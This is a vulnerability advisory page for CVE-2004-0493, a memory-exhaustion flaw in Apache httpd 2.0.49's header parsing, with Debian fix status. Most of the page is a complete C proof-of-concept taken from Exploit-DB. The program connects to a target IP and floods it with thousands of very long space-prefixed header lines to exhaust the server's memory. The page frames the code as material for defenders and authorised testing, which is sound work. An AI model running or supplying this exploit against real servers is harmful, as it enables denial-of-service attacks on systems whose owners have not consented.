CVE-2004-0493
Description
The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64-bit systems, via long header lines with large numbers of space or tab characters.
Mitigations
No mitigations published for this CVE yet.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Apache - Arbitrary Long HTTP Headers (Denial of Service)
#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>
#define A 0x41
#define PORT 80
struct sockaddr_in hrm;
int conn(char *ip)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(PORT);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr)))<0)
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
int i,x;
char buf[300],a1[8132],a2[50],host[100],content[100];
char *ip=argv[1],*new=malloc(sizeof(int));
sprintf(new,"\r\n");
memset(a1,'\0',8132);
memset(host,'\0',100);
memset(content,'\0',100);
a1[0] = ' ';
for(i=1;i<8132;i++)
a1[i] = A;
if(argc<2)
{
printf("%s: IP\n",argv[0]);
exit(0);
}
x = conn(ip);
printf("[x] Connected to: %s.\n",inet_ntoa(hrm.sin_addr));
sprintf(host,"Host: %s\r\n",argv[1]);
sprintf(content,"Content-Length: 50\r\n");
sprintf(buf,"GET / HTTP/1.0\r\n");
write(x,buf,strlen(buf));
printf("[x] Sending buffer...");
for(i=0;i<2000;i++)
{
write(x,a1,strlen(a1));
write(x,new,strlen(new));
}
memset(buf,'\0',300);
strcpy(buf,host);
strcat(buf,content);
for(i=0;i<50;i++)
a2[i] = A;
strcat(buf,a2);
strcat(buf,"\r\n\r\n");
write(x,buf,strlen(buf));
printf("done!\n");
close(x);
}
// milw0rm.com [2004-08-02]
OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 2.0.50-1 |
| sid | Fixed | 2.0.50-1 |
| forky | Fixed | 2.0.50-1 |
| bullseye | Fixed | 2.0.50-1 |
| bookworm | Fixed | 2.0.50-1 |